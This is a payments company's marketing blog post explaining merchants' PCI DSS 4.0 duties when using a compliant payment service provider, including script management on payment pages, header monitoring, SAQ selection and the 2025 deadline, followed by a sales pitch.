Merchant’s responsibilities Under PCI DSS 4.0 When Working with a PCI Compliant PSP

When considering PCI DSS 4.1 requirements, many merchants ask, “What am I responsible for?”

If you accept card payments, even through a Payment Service Provider (PSP), compliance isn’t optional and some responsibilities fall on the merchant. This guide explains your responsibilities under PCI DSS 4.1, particularly requirements related to securing payment pages and preventing client-side data breaches.

Why Merchants Must Comply with PCI DSS 4.1

PCI DSS (Payment Card Industry Data Security Standard) is mandatory for any merchant that accepts payments from Visa, Mastercard, American Express, and other major card schemes. Compliance helps protect cardholder data from breaches and fraud.

Even if your PSP manages most aspects of card processing, PCI DSS still applies. Why? Because merchant websites directly influence how payment data is transmitted to the PSP, making merchants partly responsible for securing these interactions.

Get Your Report

The Five Fraud Challenges Online Marketplaces Must Address

Learn how to empower your marketplace with important security insights from Rapyd

Download Report
The papers report inside a tablet

PCI DSS Requirements for Merchants

Two requirements in PCI DSS need to be understood by merchants:

Requirement 6.4.3 – Client-Side Script Management

You must:

  • Inventory all scripts on payment pages.
  • Authorise and justify each script’s use.
  • Regularly verify scripts remain unchanged and secure.

Requirement 11.6.1 – Monitoring HTTP Headers

You must also:

  • Monitor and receive alerts for unauthorised modifications to HTTP headers.

These measures protect against threats like Magecart attacks, formjacking, and other malicious activities that exploit browser vulnerabilities.

Do Merchants Need PCI DSS if Using Embedded PSP Forms?

Yes. Even when you embed a PSP’s payment form (like an iframe), the merchant webpage that hosts it must comply. Unless a third party entirely hosts your payment pages, you must follow PCI DSS requirements.

How to Clarify Your Compliance Scope

Clarifying your exact PCI DSS compliance scope involves:

  • Conducting an environment evaluation.
  • Determining your precise use of PSP services.
  • Documenting all processes that interact with cardholder data.

Selecting the Right SAQ

Choosing the correct Self-Assessment Questionnaire (SAQ) is foundational to your PCI DSS compliance. 

Here’s what to keep in mind: 

  • SAQs vary depending on how payments are processed (online, phone, in-person).
  • Using the wrong SAQ risks overlooking essential security measures.
  • SAQs must be up-to-date with PCI Council’s latest versions.

Not sure where to start? Bringing in a Qualified Security Assessor (QSA) or PCI Professional (PCIP) takes the guesswork out and helps you avoid costly mistakes.

Deadline for PCI DSS 4.0 Compliance

PCI DSS 4.0 is mandatory as of March 31, 2025. If you haven’t started implementing the necessary changes, now is the time.

Get PCI Compliant Payments with Global Reach

Rapyd provides comprehensive payment solutions and direct card acquiring services, and fully PCI DSS compliant card processing.

With Rapyd, you’ll benefit from:

  • Direct Visa and Mastercard acquiring in the UK, Europe, Israel and Singapore
  • Cards, Google Pay, Apple Pay, and hundreds of other payment methods
  • Among the best authorisation rates globally
  • Payments, payouts, and multi-currency business accounts
Contact Us
A Hand Typing On A Laptop Photographed From The Side
Card-Not-Present Transactions: Risks and Best Practices
Read Blog Post
Variety Of Euro Banknotes
Chargeback vs Refund: Key Differences
Read Blog Post
A Man Sits Cross-legged At An Airport And Watches A Plane Take Off.
A Guide to Payment Processing for the Travel Industry
Read Blog Post

Subscribe Via Email

Thank You!

You’ve Been Subscribed.

More Payments
In More Places
Get one platform for all the ways the world pays.

GET STARTED